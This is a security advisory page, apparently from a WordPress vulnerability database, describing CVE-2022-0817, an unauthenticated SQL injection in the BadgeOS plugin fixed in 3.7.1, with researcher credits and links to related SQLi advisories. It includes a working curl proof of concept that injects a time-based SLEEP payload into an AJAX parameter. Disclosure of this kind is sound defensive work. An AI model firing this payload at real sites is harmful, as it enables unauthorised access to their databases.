BadgeOS < 3.7.1 – Unauthenticated SQLi | CVE 2022-0817 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users

Note: v3.7.1 removed the AJAX actions from being available to unauthenticated users, however the SQLi is still present but exploitable by authenticated users and a separate advisory has been made

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=get-achievements&total_only=true&user_id=11 AND (SELECT 9628 FROM (SELECT(SLEEP(5)))WOrh)-- KUsb'

Affects Plugins

Fixed in 3.7.1

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

69263610-f454-4f27-80af-be523d25659e

Timeline

Publicly Published

2022-04-13 (about 3 years ago)

Added

2022-04-13 (about 3 years ago)

Last Updated

2022-08-23 (about 3 years ago)

Other

Published

Title

Published

2022-09-20

Title

Search Logger <= 0.9 - Admin+ SQLi

Published

2023-06-23

Title

MStore API < 4.0.2 - Unauthenticated SQL Injection

Published

2017-08-25

Title

WP Like Post <= 1.5.2 - Authenticated SQL Injection

Published

2022-02-01

Title

Conversios.io < 4.6.2 - Subscriber+ SQL Injection

Published

2023-10-30

Title

Left right image slideshow gallery < 12.1 - Authenticated (Subscriber+) SQL Injection via Shortcode